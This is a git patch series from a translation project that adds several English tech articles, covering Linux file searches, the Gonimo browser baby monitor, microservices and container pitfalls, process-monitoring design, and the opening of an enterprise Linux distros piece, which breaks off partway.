+There are many ways to search for files on Linux systems and the commands can be very easy or very specific -- narrowing down your search criteria to find just what you're looking for and nothing else. In today's post, we're going to examine some of the most useful commands and options for your file searches. We're going to look into:
+
+ * Quick finds
+ * More complex search criteria
+ * Combining conditions
+ * Reversing criteria
+ * Simple vs. detailed responses
+ * Looking for duplicate files
+
+
+
+There are actually several useful commands for searching for files. The **find** command may be the most obvious, but it's not the only command or always the fastest way to find what you're looking for.
+
+### Quick file search commands: which and locate
+
+The simplest commands for searching for files are probably **which** and **locate**. Both have some constraints that you should be aware of. The **which** command is only going to search through directories on your search path looking for files that are executable. It is generally used to identify commands. If you are curious about what command will be run when you type "which", for example, you can use the command "which which" and it will point you to the executable.
+```
+$ which which
+/usr/bin/which
+
+```
+
+The **which** command will display the first executable that it finds with the name you supply (i.e., the one you would run if you use that command) and then stop.
+
+The **locate** command is a bit more generous. However, it has a constraint, as well. It will find any number of files, but only if the file names are contained in a database prepared by the **updatedb** command. That file will likely be stored in some location like /var/lib/mlocate/mlocate.db, but is not intended to be read by anything other than the locate command. Updates to this file are generally made by updatedb running daily through cron.
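+
+If the database hasn't yet caught up with a recently created file, you can refresh it by hand before searching -- a quick sketch, with output that will of course differ on your system:
+```
+$ sudo updatedb
+$ locate runme
+/home/shs/bin/runme
+
+```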
+
+Simple **find** commands don't require a lot more effort, but they do require a starting point for the search and some kind of search criteria. The simplest find command -- one that searches for files by name -- might look like this:
+```
+$ find . -name runme
+./bin/runme
+
+```
+
+Searching from the current position in the file system by file name as shown will also involve searching all subdirectories unless a search depth is specified.
+
+### More than just file names
+
+The **find** command allows you to search on a number of criteria beyond just file names. These include file owner, group, permissions, size, modification time, lack of an active owner or group and file type. And you can do things beyond just locating the files. You can delete them, rename them, change ownership, change permissions, or run nearly any command against the located files.
+
+These two commands would find 1) files owned by root within the current directory and 2) files _not_ owned by the specified user (in this case, shs). In this case, both responses are the same, but they won't always be.
+```
+$ find . -user root -ls
+ 396926 0 lrwxrwxrwx 1 root root 21 Sep 21 09:03 ./xyz -> /home/peanut/xyz
+$ find . ! -user shs -ls
+ 396926 0 lrwxrwxrwx 1 root root 21 Sep 21 09:03 ./xyz -> /home/peanut/xyz
+
+```
+
+The ! character represents "not" -- reversing the condition that follows it.
+
+The command below finds files that have a particular set of permissions.
+```
+$ find . -perm 750 -ls
+ 397176 4 -rwxr-x--- 1 shs shs 115 Sep 14 13:52 ./ll
+ 398209 4 -rwxr-x--- 1 shs shs 117 Sep 21 08:55 ./get-updates
+ 397145 4 drwxr-x--- 2 shs shs 4096 Sep 14 15:42 ./newdir
+
+```
+
+This command displays files with 777 permissions that are _not_ symbolic links.
+```
+$ sudo find /home -perm 777 ! -type l -ls
+ 397132 4 -rwxrwxrwx 1 shs shs 18 Sep 15 16:06 /home/shs/bin/runme
+ 396949 4 -rwxrwxrwx 1 root root 558 Sep 21 11:21 /home/oops
+
+```
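+
+Conditions listed together are implicitly ANDed, as in the example above. You can also OR conditions with -o and group tests with escaped parentheses -- a small sketch using made-up name patterns:
+```
+$ find . \( -name '*.tmp' -o -name '*.bak' \) -type f -ls
+
+```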
+
+The following command looks for files that are larger than a gigabyte in size. And notice that we've located a very interesting file. It represents the physical memory of this system in the ELF core file format.
+```
+$ sudo find / -size +1G -ls
+4026531994 0 -r-------- 1 root root 140737477881856 Sep 21 11:23 /proc/kcore
+ 1444722 15332 -rw-rw-r-- 1 shs shs 1609039872 Sep 13 15:55 /home/shs/Downloads/ubuntu-17.04-desktop-amd64.iso
+
+```
+
+Finding files by file type is easy as long as you know how the file types are described for the find command.
+```
+b = block special file
+c = character special file
+d = directory
+p = named pipe
+f = regular file
+l = symbolic link
+s = socket
+D = door (Solaris only)
+
+```
+
+In the commands below, we are looking for symbolic links and sockets.
+```
+$ find . -type l -ls
+ 396926 0 lrwxrwxrwx 1 root root 21 Sep 21 09:03 ./whatever -> /home/peanut/whatever
+$ find . -type s -ls
+ 395256 0 srwxrwxr-x 1 shs shs 0 Sep 21 08:50 ./.gnupg/S.gpg-agent
+
+```
+
+You can also search for files by inode number.
+```
+$ find . -inum 397132 -ls
+ 397132 4 -rwx------ 1 shs shs 18 Sep 15 16:06 ./bin/runme
+
+```
+
+Another way to search for files by inode involves using the **debugfs** command. On a large file system, this command might be considerably faster than using find. You may need to install icheck.
+```
+$ sudo debugfs -R 'ncheck 397132' /dev/sda1
+debugfs 1.42.13 (17-May-2015)
+Inode Pathname
+397132 /home/shs/bin/runme
+
+```
+
+In the following command, we're starting in our home directory (~), limiting the depth of our search (how deeply we'll search subdirectories) and looking only for files that have been created or modified within the last day (mtime setting).
+```
+$ find ~ -maxdepth 2 -mtime -1 -ls
+ 407928 4 drwxr-xr-x 21 shs shs 4096 Sep 21 12:03 /home/shs
+ 394006 8 -rw------- 1 shs shs 5909 Sep 21 08:18 /home/shs/.bash_history
+ 399612 4 -rw------- 1 shs shs 53 Sep 21 08:50 /home/shs/.Xauthority
+ 399615 4 drwxr-xr-x 2 shs shs 4096 Sep 21 09:32 /home/shs/Downloads
+
+```
+
+### More than just listing files
+
+With an **-exec** option, the find command allows you to change files in some way once you've found them. You simply need to follow the -exec option with the command you want to run.
+```
+$ find . -name runme -exec chmod 700 {} \;
+$ find . -name runme -ls
+ 397132 4 -rwx------ 1 shs shs 18 Sep 15 16:06 ./bin/runme
+
+```
+
+In this command, {} represents the name of the file. This command would change permissions on any files named "runme" in the current directory and subdirectories.
+
+Put whatever command you want to run after the -exec option, using a syntax similar to what you see above.
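+
+If the command you run accepts multiple file names, you can end the clause with a plus sign instead of an escaped semicolon; find then batches many files into each invocation, which is usually faster. For example, to apply the same permissions change as above in batches:
+```
+$ find . -name runme -exec chmod 700 {} +
+
+```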
+
+### Other search criteria
+
+As shown in one of the examples above, you can also search by other criteria -- file age, owner, permissions, etc. Here are some examples.
+
+#### Finding by user
+```
+$ sudo find /home -user peanut
+/home/peanut
+/home/peanut/.bashrc
+/home/peanut/.bash_logout
+/home/peanut/.profile
+/home/peanut/examples.desktop
+
+```
+
+#### Finding by file permissions
+```
+$ sudo find /home -perm 777
+/home/shs/whatever
+/home/oops
+
+```
+
+#### Finding by age
+```
+$ sudo find /home -mtime +100
+/home/shs/.mozilla/firefox/krsw3giq.default/gmp-gmpopenh264/1.6/gmpopenh264.info
+/home/shs/.mozilla/firefox/krsw3giq.default/gmp-gmpopenh264/1.6/libgmpopenh264.so
+
+```
+
+#### Finding by age comparison
+
+Commands like this allow you to find files newer than some other file.
+```
+$ sudo find /var/log -newer /var/log/syslog
+/var/log/auth.log
+
+```
+
+### Finding duplicate files
+
+If you're looking to clean up disk space, you might want to remove large duplicate files. The best way to determine whether files are truly duplicates is to use the **fdupes** command. This command uses md5 checksums to determine if files have the same content. With the -r (recursive) option, fdupes will run through a directory and find files that have the same checksum and are thus identical in content.
+
+If you run a command like this as root, you will likely find a lot of duplicate files, but many will be startup files that were added to home directories when they were created.
+```
+# fdupes -rn /home > /tmp/dups.txt
+# more /tmp/dups.txt
+/home/jdoe/.profile
+/home/tsmith/.profile
+/home/peanut/.profile
+/home/rocket/.profile
+
+/home/jdoe/.bashrc
+/home/tsmith/.bashrc
+/home/peanut/.bashrc
+/home/rocket/.bashrc
+
+```
+
+Similarly, you might find a lot of duplicate configuration files in /usr that you shouldn't remove. So, be careful with the fdupes output.
+
+The fdupes command isn't always speedy, but keeping in mind that it's running checksum queries over a lot of files to compare them, you'll probably appreciate how efficient it is.
+
+### Wrap-up
+
+There are lots of ways to locate files on Linux systems. If you can describe what you're looking for, one of the commands above will help you find it.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.networkworld.com/article/3227075/linux/mastering-file-searches-on-linux.html
+
+作者:[Sandra Henry-Stocker][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.networkworld.com/author/Sandra-Henry_Stocker/
From 528871b714efda5b98fde6d2799ad91caa09447a Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:28:47 +0800
Subject: [PATCH 065/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20create?=
=?UTF-8?q?=20a=20free=20baby=20monitoring=20system=20with=20Gonimo?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...free baby monitoring system with Gonimo.md | 135 ++++++++++++++++++
1 file changed, 135 insertions(+)
create mode 100644 sources/tech/20170928 How to create a free baby monitoring system with Gonimo.md
diff --git a/sources/tech/20170928 How to create a free baby monitoring system with Gonimo.md b/sources/tech/20170928 How to create a free baby monitoring system with Gonimo.md
new file mode 100644
index 0000000000..0b68b7967a
--- /dev/null
+++ b/sources/tech/20170928 How to create a free baby monitoring system with Gonimo.md
@@ -0,0 +1,135 @@
+How to create a free baby monitoring system with Gonimo
+======
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/baby.png?itok=7jyDs9vE)
+
+New and expecting parents quickly learn that there is a long--and expensive--list of equipment that a new baby needs. High on that list is a baby monitor, so they can keep an eye (and an ear) on their infant while they're doing other things. But this is one piece of equipment that doesn't have to eat into your baby fund; Gonimo is a free and open source solution that turns existing devices into a baby monitoring system, freeing up some of your baby budget for any of the thousands of other must-have or trendy items lining the aisles of the nearby big-box baby store.
+
+Gonimo was born when its developer, an open source fan, had twins and found problems with the existing options:
+
+ * Status-quo hardware baby monitors are expensive, have limited range, and require you to carry extra devices.
+ * There are mobile monitoring apps, but most of the existing iOS/Android baby monitoring apps are unreliable and unsecure, with no obvious open source product in sight.
+ * If you have two young children (e.g., twins), you'll need two monitors, doubling your costs.
+
+
+
+Gonimo was created as an open source solution to the shortcomings of typical monitors:
+
+ * Expensive? Nope, it is free!
+ * Limited range? No, it works with internet/WiFi, wherever you are.
+ * Download and install apps? Uh-uh, it works in your existing web browser.
+ * Buy new devices? No way, you can use any laptop, mobile phone, or tablet with a web browser and a microphone and/or camera.
+
+
+
+(Note: Apple iOS devices are unfortunately not yet supported, but that's expected to change very soon--read on for how you can help make that happen.)
+
+### Get started
+
+Transforming your devices into a baby monitor is easy. From your device's browser (ideally Chrome), visit [gonimo.com][1] and click Start baby monitor to get to the web app.
+
+ 1. **Create family:** On the first-time startup screen, you will see a cute rabbit running on the globe. This is where you create a new family. Hit the **+** button and either accept the randomly generated family name or type in your own choice.
+
+
+
+![Start screen][3]
+
+
+Create a new family from the start screen
+
+ 1. **Invite devices:** After you've set up your family, the next screen directs you to invite another device to join your Gonimo family. There is a one-time invitation link that you can directly send via email or copy and paste into a message. From the other device, simply open the link and accept the invitation. Repeat this process for any other devices you'd like to invite to your family. Your devices are now in the same family, ready to cooperate as a fully working baby monitor system.
+
+
+
+![Invite screen][5]
+
+
+Invite family members
+
+ 1. **Start baby station stream:** Next, choose which device will stream the baby's audio and video to the parent station by going to the [Gonimo home screen][6], clicking on the button with the pacifier, and giving the web browser permission to access the device's microphone and camera. Adjust the camera to point at your baby's bed, or turn it off to save device battery (audio will still be streamed). Hit Start. The stream is now active.
+
+
+
+![Select baby station][8]
+
+
+Select the baby station
+
+![Press Start][10]
+
+
+Press Start to stream video.
+
+ 1. **Connect to parent station stream:** To view the baby station stream, go to another device in your Gonimo family --this is the parent station. Hit the "parent" button on the Gonimo home screen. You will see a list of all the devices in the family; next to the one with the active baby station will be a pulsing Connect button. Select Connect, and you can see and hear your baby over a peer-to-peer audio/video stream. A volume bar provides visualization for the transmitted audio stream.
+
+
+
+![Select parent station][12]
+
+
+Select parent station
+
+![Press Connect][14]
+
+
+Press Connect to start viewing the baby stream.
+
+ 1. **Congratulations!** You have successfully transformed your devices into a baby monitor directly over a web browser without downloading or installing any apps!
+
+
+
+For more information and detailed descriptions about renaming devices, removing devices from a family, or deleting a family, check out the [video tutorial][15] at gonimo.com.
+
+### Flexibility of the family system
+
+One of Gonimo's strengths is its family-based system, which offers enormous flexibility for different kinds of situations that aren't available even in commercial Android or iOS apps. To dive into these features, let's assume that you have created a family that consists of three devices.
+
+ * **Multi-baby:** What if you want to keep an eye on your two young children who sleep in separate rooms? Put a device in each child's room and set them as baby stations. The third device will act as the parent station, on which you can connect to both streams and see your toddlers via split screen. You can even extend this use case to more than two baby stations by inviting more devices to your family and setting them up as baby stations. As soon as your parent station is connected to the first baby station, return to the Device Overview screen by clicking the back arrow in the top left corner. Now you can connect to the second (and, in turn, the third, and fourth, and fifth, and so on) device, and the split screen will be established automatically. Voila!
+
+
+ * **Multi-parent:** What if daddy wants to watch the children while he's at work? Just invite a fourth device (e.g., his office PC) to the family and set it up as a parent station. Both parents can check in on their children simultaneously from their own devices, even independently choosing to which stream(s) they wish to connect.
+
+
+ * **Multi-family:** A single device can also be part of several families. This is very useful when your baby station is something that's always with you, such as a tablet, and you frequently visit relatives or friends. Create another family for "Granny's house" or "Uncle John's house," which consists of your baby station device paired with Granny's or Uncle John's devices. You can switch the baby station device among those families, whenever you want, from the baby station device's Gonimo home screen.
+
+
+
+### Want to participate?
+
+The Gonimo team loves open source. Code from the community, for the community. Gonimo's users are very important to us, but they are only one part of the Gonimo story. Creative brains behind the scenes are the key to creating a great baby monitor experience.
+
+Currently we especially need help from people who are willing to be iOS 11 testers, as Apple's support of WebRTC in iOS 11 means we will finally be able to support iOS devices. If you can, please help us realize this awesome milestone.
+
+If you know Haskell or want to learn it, you can check out [our code at GitHub][16]. Pull requests, code reviews, and issues are all welcome.
+
+And, finally, please help by spreading the word to new parents and the open source world that the Gonimo baby monitor is simple to use and already in your pocket.
+
+### About The Author
+Robert Klotzner: I am father of twins and a programmer. Once I heard that ordinary people can actually program computers, I bought a book about C and started learning; I was fifteen back then. I stuck with C for quite a while, learned Java, and went back to C.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/17/9/gonimo
+
+作者:[Robert Klotzner][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/robert-klotzner
+[1]:https://gonimo.com/
+[2]:/file/371256
+[3]:https://opensource.com/sites/default/files/u128651/start-screen.png (Start screen)
+[4]:/file/371236
+[5]:https://opensource.com/sites/default/files/u128651/invite-screen.png (Invite screen)
+[6]:https://app.gonimo.com/
+[7]:/file/371231
+[8]:https://opensource.com/sites/default/files/u128651/baby-select.png (Select baby station)
+[9]:/file/371226
+[10]:https://opensource.com/sites/default/files/u128651/baby-screen.png (Press Start)
+[11]:/file/371251
+[12]:https://opensource.com/sites/default/files/u128651/parent-select.png (Select parent station)
+[13]:/file/371241
+[14]:https://opensource.com/sites/default/files/u128651/parent-screen.png (Press Connect)
+[15]:https://gonimo.com/index.php#intro
+[16]:https://github.com/gonimo/gonimo
From 1444d1c4bae61fc4c91118ffb6c85a67a998ee90 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:30:52 +0800
Subject: [PATCH 066/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Microservices=20a?=
=?UTF-8?q?nd=20containers:=205=20pitfalls=20to=20avoid?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ces and containers- 5 pitfalls to avoid.md | 80 +++++++++++++++++++
1 file changed, 80 insertions(+)
create mode 100644 sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
diff --git a/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md b/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
new file mode 100644
index 0000000000..e92ee3f89a
--- /dev/null
+++ b/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
@@ -0,0 +1,80 @@
+Microservices and containers: 5 pitfalls to avoid
+======
+
+![](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO%20Containers%20Ecosystem.png?itok=lDTaYXzk)
+
+Because microservices and containers are a [match made in heaven][1], it might seem like nothing could go wrong. Let's get these babies into production as quickly as possible, then kick back and wait for the IT promotions and raises to start flooding in. Right?
+
+(We'll pause while the laughter subsides.)
+
+Yeah, sorry. That's just not how it works. While the two technologies can be a powerful combination, realizing their potential doesn't happen without some effort and planning. In previous posts, we've tackled what you should [know at the start][2]. But what about the most common problems organizations encounter when they run microservices in containers?
+
+Knowing these potential snafus in advance can help you avoid them and lay a more solid foundation for success.
+
+It starts with being realistic about your organization's needs, knowledge, resources, and more. "One common [mistake] is to try to adopt everything at once," says Mac Browning, engineering manager at [DigitalOcean][3]. "Be realistic about how your company adopts containers and microservices."
+
+**[ Struggling to explain microservices to your bosses and colleagues? Read our primer on[how to explain microservices in plain English][4]. ]**
+
+Browning and other IT pros shared five pitfalls they see organizations encounter with containerized microservices, especially early in their production lifespan. Knowing them will help you develop your own realistic organizational assessment as you build your strategy for microservices and containers.
+
+### 1. Trying to learn both from scratch simultaneously
+
+If you're just starting to move away from 100% monolithic applications, or if your organization doesn't already have a deep knowledge base for containers or microservices, remember this: Microservices and containers aren't actually tethered to one another. That means you can develop your in-house expertise with one before adding the other. Kevin McGrath, senior CTO architect at [Sungard Availability Services][5], recommends building up your team's knowledge and skills with containers first, by containerizing existing or new applications, and then moving to a microservices architecture where beneficial in a later phase.
+
+"Companies that run microservices extremely well got there through years of iteration that gave them the ability to move fast," McGrath says. "If the organization cannot move fast, microservices are going to be difficult to support. Learn to move fast, which containers can help with, then worry about killing the monolith."
+
+### 2. Starting with a customer-facing or mission-critical application
+
+A related pitfall for organizations just getting started with containers, microservices, or both: Trying to tame the lion in the monolithic jungle before you've gotten some practice with some animals lower on the food chain.
+
+Expect some missteps along your team's learning curve - do you want those made with a critical customer-facing application or, say, a lower-stakes service visible only to IT or other internal teams?
+
+"If the entire ecosystem is new, then adding their use into lower-impact areas like your continuous integration system or internal tools may be a low-risk way to gain some operational expertise [with containers and microservices," says Browning of DigitalOcean. "As you gain experience, you'll naturally find new places you can leverage these technologies to deliver a better product to your customers. The fact is, things will go wrong, so plan for them in advance."
+
+### 3. Introducing too much complexity without the right team in place
+
+As your microservices architecture scales, it can generate complex management needs.
+
+As [Red Hat][6] technology evangelist [Gordon Haff][7] recently wrote, "An OCI-compliant container runtime by itself is very good at managing single containers. However, when you start using more and more containers and containerized apps, broken down into hundreds of pieces, management and orchestration gets tricky. Eventually, you need to take a step back and group containers to deliver services - such as networking, security, and telemetry - across your containers."
+
+"Furthermore, because containers are portable, it's important that the management stack that's associated with them be portable as well," Haff notes. "That's where orchestration technologies like [Kubernetes][8] come in, simplifying this need for IT." (See the full article by Haff: [5 advantages of containers for writing applications][1]. )
+
+In addition, you need the right team in place. If you're already a [DevOps shop][9], you might be particularly well-suited for the transition. Regardless, put a cross-section of people at the table from the start.
+
+"As more services get deployed overtime, it can become unwieldy to manage," says Mike Kavis, VP and principal cloud architect at [Cloud Technology Partners][10]. "In the true essence of DevOps, make sure that all domain experts - dev, test, security, ops, etc. - are participating up front and collaborating on the best ways to build, deploy, run, and secure container-based microservices.
+
+### 4. Ignoring automation as a table-stakes requirement
+
+In addition to having the right team, organizations that have the most success with container-based microservices tend to tackle the inherent complexity with an "automate as much as possible" mindset.
+
+"Distributed architectures are not easy, and elements like data persistence, logging, and debugging can get really complex in microservice architectures," says Carlos Sanchez, senior software engineer at [CloudBees][11], of some of the common challenges. By definition, those distributed architectures that Sanchez mentions will become a Herculean operational chore as they grow. "The proliferation of services and components makes automation a requirement," Sanchez advises. "Manual management will not scale."
+
+### 5. Letting microservices fatten up over time
+
+Running a service or software component in a container isn't magic. Doing so does not guarantee that, voila, you've got a microservice. Manuel Nedbal, CTO at [ShieldX Networks][12], notes that IT pros need to ensure their microservices stay microservices over time.
+
+"Some software components accumulate lots of code and features over time. Putting them into a container does not necessarily generate microservices and may not yield the same benefits," Nedbal says. "Also, as components grow in size, engineers need to be watchful for opportunities to break up evolving monoliths again."
+
+--------------------------------------------------------------------------------
+
+via: https://enterprisersproject.com/article/2017/9/using-microservices-containers-wisely-5-pitfalls-avoid
+
+作者:[Kevin Casey][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://enterprisersproject.com/user/kevin-casey
+[1]:https://enterprisersproject.com/article/2017/8/5-advantages-containers-writing-applications
+[2]:https://enterprisersproject.com/article/2017/9/microservices-and-containers-6-things-know-start-time
+[3]:https://www.digitalocean.com/
+[4]:https://enterprisersproject.com/article/2017/8/how-explain-microservices-plain-english?sc_cid=70160000000h0aXAAQ
+[5]:https://www.sungardas.com/
+[6]:https://www.redhat.com/en
+[7]:https://enterprisersproject.com/user/gordon-haff
+[8]:https://www.redhat.com/en/containers/what-is-kubernetes
+[9]:https://enterprisersproject.com/article/2017/8/devops-jobs-how-spot-great-devops-shop
+[10]:https://www.cloudtp.com/
+[11]:https://www.cloudbees.com/
+[12]:https://www.shieldx.com/
From 3e0a007a8ac7339e3aac3f0a8b6a265c1db9a79c Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:33:26 +0800
Subject: [PATCH 067/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Process=20Monitor?=
=?UTF-8?q?ing?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20170928 Process Monitoring.md | 54 +++++++++++++++++++++
1 file changed, 54 insertions(+)
create mode 100644 sources/tech/20170928 Process Monitoring.md
diff --git a/sources/tech/20170928 Process Monitoring.md b/sources/tech/20170928 Process Monitoring.md
new file mode 100644
index 0000000000..c46f4bca12
--- /dev/null
+++ b/sources/tech/20170928 Process Monitoring.md
@@ -0,0 +1,54 @@
+Process Monitoring
+======
+
+Since forking the Mon project to [etbemon [1]][1] I've been spending a lot of time working on the monitor scripts. Actually monitoring something is usually quite easy; deciding what to monitor tends to be the hard part. The process monitoring script ps.monitor is the one I'm about to redesign.
+
+Here are some of my ideas for monitoring processes. Please comment if you have any suggestions for how to do things better.
+
+For people who don't use mon, the monitor scripts return 0 if everything is OK and 1 if there's a problem, along with using stdout to display an error message. While I'm not aware of anyone hooking mon scripts into a different monitoring system, that's going to be easy to do. One thing I plan to work on in the future is interoperability between mon and other systems such as Nagios.
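+
+As a rough illustration (this is not the actual ps.monitor script, and the process name is just an example), a mon-style monitor can be as small as a shell script that prints an error to stdout and exits non-zero on failure:
+```
+#!/bin/bash
+# Minimal sketch of a mon-style monitor: exit 0 when healthy,
+# print a message to stdout and exit 1 when something is wrong.
+if pgrep -x sshd > /dev/null; then
+    exit 0
+else
+    echo "sshd is not running"
+    exit 1
+fi
+```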
+
+### Basic Monitoring
+```
+ps.monitor tor:1-1 master:1-2 auditd:1-1 cron:1-5 rsyslogd:1-1 dbus-daemon:1- sshd:1- watchdog:1-2
+```
+
+I'm currently planning some sort of rewrite of the process monitoring script. The current functionality is to have a list of process names on the command line with minimum and maximum numbers for the instances of the process in question. The above is a sample of the configuration of the monitor. There are some limitations to this: the "master" process in this instance refers to the main process of Postfix, but other daemons use the same process name (it's one of those names that's wrong because it's so obvious). One obvious solution to this is to give the option of specifying the full path so that /usr/lib/postfix/sbin/master can be differentiated from all the other programs named master.
+
+The next issue is processes that may run on behalf of multiple users. With sshd there is a single process to accept new connections running as root and a process running under the UID of each logged in user. So the number of sshd processes running as root will be one greater than the number of root login sessions. This means that if a sysadmin logs in directly as root via ssh (which is controversial and not the topic of this post - merely something that people do which I have to support) and the master process then crashes (or the sysadmin stops it either accidentally or deliberately) there won't be an alert about the missing process. Of course the correct thing to do is to have a monitor talk to port 22 and look for the string "SSH-2.0-OpenSSH_". Sometimes there are multiple instances of a daemon running under different UIDs that need to be monitored separately. So obviously we need the ability to monitor processes by UID.
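+
+A quick sketch of that banner check (hypothetical; a real monitor would need to be more robust and configurable), using bash's /dev/tcp with a five second timeout:
+```
+#!/bin/bash
+# A healthy OpenSSH server sends its banner as soon as we connect,
+# so read the first line from port 22 and check its prefix.
+banner=$(timeout 5 bash -c 'head -n 1 < /dev/tcp/localhost/22' 2>/dev/null)
+if [[ "$banner" == SSH-2.0-OpenSSH_* ]]; then
+    exit 0
+else
+    echo "unexpected or missing SSH banner: '$banner'"
+    exit 1
+fi
+```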
+
+In many cases process monitoring can be replaced by monitoring of service ports. So if something is listening on port 25 then it probably means that the Postfix "master" process is running regardless of what other "master" processes there are. But for my use I find it handy to have multiple monitors, if I get a Jabber message about being unable to send mail to a server immediately followed by a Jabber message from that server saying that "master" isn't running I don't need to fully wake up to know where the problem is.
+
+### SE Linux
+
+One feature that I want is monitoring SE Linux contexts of processes in the same way as monitoring UIDs. While I'm not interested in writing tests for other security systems I would be happy to include code that other people write. So whatever I do I want to make it flexible enough to work with multiple security systems.
+
+### Transient Processes
+
+Most daemons have a second process of the same name running during the startup process. This means if you monitor for exactly 1 instance of a process you may get an alert about 2 processes running when "logrotate" or something similar restarts the daemon. Also you may get an alert about 0 instances if the check happens to run at exactly the wrong time during the restart. My current way of dealing with this on my servers is to not alert until the second failure event with the "alertafter 2" directive. The "failure_interval" directive allows specifying the time between checks when the monitor is in a failed state, setting that to a low value means that waiting for a second failure result doesn't delay the notification much.
+
+To deal with this I've been thinking of making the ps.monitor script automatically check again after a specified delay. I think that solving the problem with a single parameter to the monitor script is better than using 2 configuration directives to mon to work around it.
+
+### CPU Use
+
+Mon currently has a loadavg.monitor script to check the load average. But that won't catch the case of a single process using too much CPU time but not enough to raise the system load average. Also it won't catch the case of a CPU hungry process going quiet (e.g. when the SETI at Home server goes down) while another process goes into an infinite loop. One way of addressing this would be to have the ps.monitor script have yet another configuration option to monitor CPU use, but this might get confusing. Another option would be to have a separate script that alerts on any process that uses more than a specified percentage of CPU time over its lifetime or over the last few seconds unless it's in a whitelist of processes and users who are exempt from such checks. Probably every regular user would be exempt from such checks because you never know when they will run a file compression program. Also there is a short list of daemons that are excluded (like BOINC) and system processes (like gzip which is run from several cron jobs).
+
+### Monitoring for Exclusion
+
+A common programming mistake is to call setuid() before setgid() which means that the program doesn't have permission to call setgid(). If return codes aren't checked (and people who make such rookie mistakes tend not to check return codes) then the process keeps elevated permissions. Checking for processes running as GID 0 but not UID 0 would be handy. As an aside a quick examination of a Debian/Testing workstation didn't show any obvious way that a process with GID 0 could gain elevated privileges, but that could change with one chmod 770 command.
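+
+A small sketch of such a check (not part of etbemon; it simply lists offending processes with ps and awk):
+```
+# Print any process whose real GID is 0 (root group) but whose UID is not 0.
+ps -eo pid,uid,gid,comm --no-headers | awk '$3 == 0 && $2 != 0 {print}'
+```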
+
+On a SE Linux system there should be only one process running with the domain init_t. Currently that doesn't happen in Stretch systems running daemons such as mysqld and tor due to policy not matching the recent functionality of systemd as requested by daemon service files. Such issues will keep occurring so we need automated tests for them.
+
+Automated tests for configuration errors that might impact system security are a bigger issue; I'll probably write a separate blog post about it.
+
+--------------------------------------------------------------------------------
+
+via: https://etbe.coker.com.au/2017/09/28/process-monitoring/
+
+作者:[Andrew][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://etbe.coker.com.au
+[1]:https://doc.coker.com.au/projects/etbe-mon/
From e4379e247c7863edd0da7a8d1d92bab8e7b7e000 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:35:09 +0800
Subject: [PATCH 068/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Best=20Linux=20Di?=
=?UTF-8?q?stros=20for=20the=20Enterprise?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...7 Best Linux Distros for the Enterprise.md | 84 +++++++++++++++++++
1 file changed, 84 insertions(+)
create mode 100644 sources/tech/20170927 Best Linux Distros for the Enterprise.md
diff --git a/sources/tech/20170927 Best Linux Distros for the Enterprise.md b/sources/tech/20170927 Best Linux Distros for the Enterprise.md
new file mode 100644
index 0000000000..36411a9bfe
--- /dev/null
+++ b/sources/tech/20170927 Best Linux Distros for the Enterprise.md
@@ -0,0 +1,84 @@
+Best Linux Distros for the Enterprise
+======
+In this article, I'll share the top Linux distros for enterprise environments. Some of these distros are used in server and cloud environments along with desktop duties. The one constant that all of these Linux options have is that they are enterprise grade Linux distributions -- so you can expect a greater degree of functionality and, of course, support.
+
+### What is an enterprise grade Linux distribution?
+
+An enterprise grade Linux distribution comes down to the following - stability and support. Both of these components must be met to take any Linux distribution seriously in an enterprise environment. Stability means that the packages provided are stable to use while still maintaining an expected level of security.
+
+The support element of an enterprise grade distribution means that there is a reliable support mechanism in place. Sometimes this is a single (official) source such as a company. In other instances, it might be a governing not-for-profit that provides reliable recommendations to good third party support vendors. Obviously the former option is the best one, however both are acceptable.
+
+### Red Hat Enterprise Linux
+
+[Red Hat][1] has a number of great offerings, all with enterprise grade support made available. Their core focuses are as follows:
+
+\- Red Hat Enterprise Linux Server: This is a group of server offerings that includes everything from container hosting down to SAP server, among other server variants.
+
+\- Red Hat Enterprise Linux Desktop: These are tightly controlled user environments running Red Hat Linux that provide basic desktop functionality. This functionality includes access to the latest applications such as a web browser, email, LibreOffice and more.
+
+\- Red Hat Enterprise Linux Workstation: This is basically Red Hat Enterprise Linux Desktop, but optimized for high-performance tasks. It's also best suited for larger deployments and ongoing administration.
+
+### Why Red Hat Enterprise Linux?
+
